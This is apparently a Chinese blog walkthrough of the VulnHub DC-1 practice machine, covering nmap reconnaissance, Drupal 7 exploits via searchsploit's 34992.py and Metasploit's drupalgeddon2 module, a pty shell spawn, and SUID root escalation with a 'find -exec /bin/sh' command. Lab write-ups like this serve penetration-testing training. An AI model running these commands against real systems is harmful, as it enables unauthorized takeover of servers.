VulnHub DC-1

复制代码
🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

一、信息收集

1.nmap扫描

php 复制代码
发现开放了22算口,开放了ssh服务,OpenSSH 6.0p1
发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7
发现开放了111端口,开放了rpcbind服务

打开80端口:

二、漏洞利用

1.searchsploit

cs 复制代码
┌──(root💀kali)-[~/routing]
└─# searchsploit Drupa 7 

有一个34992.py文件可以添加管理员账户
cs 复制代码
┌──(root💀kali)-[~/routing]
└─# searchsploit -m 34992.py

复制到文件夹

不建议在本地的漏洞数据库中修改exp,建议使用-m参数复制那些有用的到当前的工作目录
cs 复制代码
┌──(root💀kali)-[~/routing/Drupal 7]
└─# python 34992.py -t http://192.168.103.188/ -u root -p root

-t 接url   -u 用户名    -p 密码

2.flag3

3.msf

cs 复制代码
msf6 > search Drupal 7

使用exploit/unix/webapp/drupal_drupalgeddon2模块

set rhosts 192.168.103.188

python -c 'import pty; pty.spawn("/bin/bash")'  #交互式shell

4.SUID提权

cs 复制代码
1.查看具有SUID的二进制可执行文件
find / -user root -perm -4000 -print 2>/dev/null

2.一些常用的可以用来提权的可执行文件:
nmap、vim、find、bash、more、less、nano、cp

3.利用find获得root权限
find / -name 已有文件名 -exec "/bin/sh" \;
比如:
find / -name misc -exec "/bin/sh" \;

5.flag

大致就是说你已经通过了本关卡

相关推荐
hbugs0019 分钟前
PNETLab vs EVE-NG Pro 流量洞察功能底层架构技术白皮书
网络·架构·eve-ng·bpf·流量洞察
RisunJan34 分钟前
Linux命令-route(查看/修改 IP 路由表)
linux·运维
不会C语言的男孩1 小时前
TCP通信可视化工具,含下载地址
服务器·网络·安全
五五六六05241 小时前
2026盘古石杯初赛
网络
玖玥拾2 小时前
C# 语言进阶(十三)网络 DLL 库分层设计
服务器·开发语言·网络·网络协议·c#
大师兄66682 小时前
HarmonyOS7 HTTP 网络请求封装:统一拦截器实战
网络·网络协议·http·arkui·harmonyos7·实战讲解
qetfw2 小时前
CentOS 7 搭建 DNS 主从服务
linux·运维·centos·dns·bind
hbugs0012 小时前
BPF 表达式检查器:一款免费开源的 Wireshark 捕获过滤器语法检查与可视化构建工具
网络·测试工具·开源·eve-ng·bpf
韩曙亮2 小时前
【Flutter】iOS 网络权限设置 ② ( 配置 iOS 平台可使用 HTTP 访问 | ATS 网络安全强制规范 )
网络·flutter·http·ios·https·网络权限·ats
柠石榴2 小时前
远程连接校内服务器 ssh
运维·服务器·ssh